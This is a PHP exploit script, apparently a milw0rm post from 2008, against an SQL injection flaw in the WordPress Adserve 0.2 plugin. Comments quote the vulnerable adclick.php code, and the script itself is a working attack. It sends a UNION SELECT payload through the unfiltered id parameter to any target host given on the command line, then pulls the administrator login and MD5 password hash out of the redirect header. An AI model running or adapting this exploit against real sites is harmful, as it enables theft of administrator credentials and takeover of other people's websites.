Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit by h3m4n


  1    <?
  2    # WordPress Adserve plugin v 0.2 Sql Injection Exploit
  3    #
  4    # Plugin Homepage−http://www.irisco.it/?page_id=40
  5    #
  6    # Found by:enter_the_dragon
  7    #
  8
  9    #   Vuln code
  10   #
  11   #   −In adclick.php
  12   #
  13   #   if (isset($_GET[’id’])) {
  14   #      Header("Location: ".iri_AdServe_BannerClick($_GET[’id’])
  15   #
  16   #   −In   iri_AdServe_BannerClick function
  17   #
  18   #          return $wpdb−>get_var("SELECT url FROM $table_name WHERE id=$id;");
  19   #
  20   #
  21   #
  22
  23   # Exploit
  24   #
  25   # id variable isnt filtered so we can inject and check the output in the Location response−header
  26   # If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
  27   #
  28   #
  29
  30
  31
  32
  33   echo "\n";
  34   echo "−−−−−−−WordPress Adserve plugin v 0.2 Sql Injection Exploit−−−−−−−"."\n";
  35   echo "−−−−−−−−−−−−−−−−−−−coded by : enter_the_dragon−−−−−−−−−−−−−−−−−−−−"."\n";
  36   echo "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−"."\n";
  37   if ($argc!=3)
  38   {
  39   echo " Usage:       $argv[0] target_host wp_path \n";
  40   echo " target_host:             Your target ex www.target.com \n";
  41   echo " wp_path:     WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
  42   echo "\n";
  43   exit;
  44   }
  45
  46
  47   $query=$argv[1];
  48   $query.=$argv[2];
  49   $query.="wp−content/plugins/wp−adserve/adclick.php?";
  50   $query.="id=−1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
  51
  52

  53   if(function_exists(curl_init))
  54   {
  55     $ch = curl_init("http://$query");
  56     curl_setopt($ch, CURLOPT_HEADER,true);
  57     curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
  58     curl_setopt($ch, CURLOPT_TIMEOUT,10);
  59     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
  60     $html=curl_exec($ch);
  61     $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
  62     curl_close($ch);
  63
  64        if($returncode==302)
  65           {
  66               $pattern="/\|(.*)?\|([a−z0−9]{32})\|/";
  67               if(preg_match($pattern,$html,$matches))
  68                 {
  69                   $adminusername=$matches[1];
  70                   $adminpass=$matches[2];
  71                   echo "Admin Login:$adminusername\n" ;
  72                   echo "Admin Pass :$adminpass\n";
  73                 }
  74           }
  75               else
  76           {
  77               exit ("Exploit Failed :( \n");
  78           }
  79
  80
  81   }
  82   else
  83   exit("Error:Libcurl isnt installed \n");
  84
  85   ?>
  86
# milw0rm.com [2008-01-30]





								